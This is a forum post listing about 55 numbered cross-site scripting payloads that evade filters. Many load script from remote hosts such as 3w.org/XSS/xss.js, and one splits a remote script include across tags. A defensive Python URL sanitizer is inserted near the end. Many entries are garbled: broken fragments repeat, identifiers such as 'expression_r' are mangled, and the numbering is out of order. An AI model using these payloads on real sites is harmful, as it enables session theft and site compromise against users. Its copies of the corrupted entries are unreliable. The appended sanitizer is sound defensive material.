XSS Attack Roundup

Posted 2016-4-28 10:06:15 by the original poster
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up boxes
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (requires being on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; the null character basically has no effect in China, because there is nowhere it can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript with escape filtering
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
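The IMG-tag variants in items (3) through (19) all beat a naive string match on "javascript:" in the same way: mixed case, HTML entities with or without semicolons, embedded tab/newline/CR, NUL bytes and leading whitespace are all tolerated by the browser before it resolves the URL scheme. The defensive check below is an added example, not code from the original post: it canonicalizes a src/href value the way a lenient browser would before deciding whether the scheme is executable. The function names normalize_url_attr, is_script_url and safe_src are my own choices.

```python
import html
import re

# Browsers discard ASCII control characters (tab, LF, CR, NUL, ...) inside a
# URL scheme, which is what the embedded-tab/newline/NUL evasions rely on.
_CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")

# Schemes that make the browser execute the value instead of fetching it.
_SCRIPT_SCHEMES = ("javascript:", "vbscript:", "livescript:", "data:text/html")


def normalize_url_attr(value: str) -> str:
    """Canonicalize an href/src/url() value like a lenient browser does.

    html.unescape resolves &#106; &#x6A; and the semicolon-less numeric forms
    (items 5, 8, 9, 10); a second pass catches double-encoded input. Control
    characters are then dropped (items 11-17, 19) and case is folded (item 4).
    """
    decoded = html.unescape(html.unescape(value))
    return _CONTROL_CHARS.sub("", decoded).lower()


def is_script_url(value: str) -> bool:
    """True if the attribute value would resolve to an executable scheme."""
    return normalize_url_attr(value).startswith(_SCRIPT_SCHEMES)


def safe_src(value: str, fallback: str = "") -> str:
    """Allow-list filter for a src/href attribute.

    Keeps http(s) and relative URLs; anything else (including every
    javascript: evasion above) is replaced by the fallback. The returned value
    must still be attribute-encoded when written into the page.
    """
    norm = normalize_url_attr(value)
    if is_script_url(value):
        return fallback
    if norm.startswith(("http://", "https://", "/")) or ":" not in norm:
        return value
    return fallback


if __name__ == "__main__":
    # Constructed samples mirroring the evasion categories listed above.
    samples = ["javascript:alert('XSS')", "JaVaScRiPt:alert('XSS')",
               "java\0script:alert('XSS')", "jav\tascript:alert('XSS')",
               "jav&#x09;ascript:alert('XSS')", "https://example.com/a.png"]
    for s in samples:
        print(repr(s), "->", "BLOCKED" if is_script_url(s) else "ok")
```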

/ J0 `8 e4 U: g- |. a, q/ ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表